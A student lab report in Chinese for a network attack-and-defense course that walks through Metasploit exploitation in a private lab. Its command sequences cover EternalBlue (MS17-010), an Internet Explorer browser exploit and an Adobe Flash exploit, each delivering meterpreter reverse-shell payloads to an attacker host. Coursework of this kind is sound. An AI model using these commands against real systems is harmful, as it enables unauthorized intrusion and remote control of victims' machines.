2018-2019-2 20165313 《網絡對抗技術》 Exp5:MSF基礎應用
實踐要求與問題回答
1. 實踐內容(3.5分)
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.1一個主動攻擊實踐,如ms08_067; (1分)
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)
1.3 一個針對客戶端的攻擊,如Adobe;(1分)
1.4 成功應用任何一個輔助模塊。(0.5分)
以上四個小實踐可不限於以上示例,並要求至少有一個是和其他所有同學不一樣的,否則扣除0.5分
問題回答
用自己的話解釋什麽是 exploit , payload , encode.
exploit: 設相當於利用漏洞打開的通道,將做好的木馬病毒等順利傳輸到靶機。
encode: 針對payload進行編碼,改變payload代碼特征(例如不出現“0x00”的特殊機器碼等),但是不改變payload為我們所用的特征,能對payload進行加工。
實踐過程
本次實踐所用的輔助功能及漏洞:nmap掃描,auxiliary輔助模塊,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2
一、Windows服務滲透攻擊——MS17-010安全漏洞
(1)打開MSF輸入nmap -O -Pn 192.168.239.129
(2)利用auxiliary輔助模塊進行掃描:
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129
msf auxiliary(scanner/smb/smb_ms17_010) > run
(3)根據要求設置並攻擊:
輸入back
退回,然後依次輸入:
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.239.131 set RHOST 192.168.239.129 exploit
二、瀏覽器滲透攻擊——MS11-050/MS14-064
(1)
打開MSF,依次輸入:
use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.239.131
set LPORT 5313
exploit
在靶機上打開生成的URL,發現報錯,猜測可能是漏洞和IE版本問題
(2)重新選擇:
主要步驟和(1)中大致相同,就是修改一下調用的名稱。註意:需要添加的指令AllowPowershellprompt---true並將http鏈接改成tcp鏈接
生成URL並開啟監聽服務:
靶機打開IE瀏覽器,輸入網址:
攻擊機回連成功,輸入sessions -i獲取對話:
三、針對Adobe Reader軟件的滲透攻擊——abode_flash_avm2
(1)生成PDF文件沒有成功(上一屆學長學姐的經驗並不好用)
(2)利用abode_flash_avm2攻擊:
(1)輸入search abode
(2)根據要求進行配置:
use exploit/windows/browser/abode_flash_avm2
set srvhost 192.168.239.131
set lhost 192.168.239.131
set payloadwindows/meterpreter/reverse_tcp
(3)在靶機裏下載adobe_flash_11。
(4)輸入exploit:
(5)在靶機裏登錄生成出來的地址:
(6)獲取權限:
實踐總結及體會
本次試驗在我看來為漏洞尋找合適的靶機是一件很費時間的事情,需要足夠的耐心,第二就是如何正確利用MSF的輔助功能為攻擊做好鋪墊,仍然需要大量反復的實踐,不然所掌握的東西僅僅知識一點點皮毛而已。同時我發現想要利用一個漏洞進行攻擊也不是一件容易的事情,因為一個漏洞不可能對所有情況都適用,所以攻擊方不僅僅是要找合適的漏洞,也要為漏洞找合適的機器或程序。矛和盾的較量看來還要持續很久很久。
2018-2019-2 20165313 《網絡對抗技術》 Exp5:MSF基礎應用